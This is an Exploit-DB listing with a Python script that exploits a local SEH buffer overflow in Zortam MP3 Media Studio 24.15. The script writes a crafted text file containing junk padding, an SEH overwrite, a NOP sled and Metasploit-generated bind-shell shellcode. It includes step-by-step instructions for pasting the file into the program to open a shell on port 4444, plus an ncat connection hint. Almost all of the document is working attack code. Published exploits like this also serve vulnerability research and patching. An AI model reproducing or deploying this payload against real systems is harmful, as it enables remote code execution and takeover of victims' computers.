Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)

EDB-ID:

45988

CVE:

N/A




Platform:

Windows

Date:

2018-12-14


#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
#Version:  24.15
#Exploit Author: Manpreet Singh Kheberi
#Date:  December 13 2018
#Download Link: https://www.zortam.com/download.html
#Vendor Homepage: https://www.zortam.com
#Tested on:  Windows Xp Sp3 x64
#Type: Bind shell
print "-----------------------------------------------------------------------------------------------------------------------"
print "                                      Zortam MP3 media studio Exploit  (SEH)      "
print "                                      by Manpreet Singh Kheberi       "
print "Generated File zortam-exploit.txt            "
print "INSTRUCTIONS:" 
print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
print "-----------------------------------------------------------------------------------------------------------------------"


filename = "zortam-exploit.txt"
junk = "\x41"*268
nseh="\x90\x90\xeb\x12"

seh ="\x8e\x32\xb5\x02" 

nop="\x90"*19
brk="\x90\x90\x90\x90"

# bind shell generated using metasploit 
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
# This will open a bind shell on port 4444
# use ncat Target-IP 4444

buf =  ""
buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
buf += "\x68\x33\x89\x37"

#boom+= "\xCC\xCC\xCC\xCC"
#calc.exe


# Used for initial exploit development phase
bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"


 
exploit = junk+nseh+seh+nop+brk+buf
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()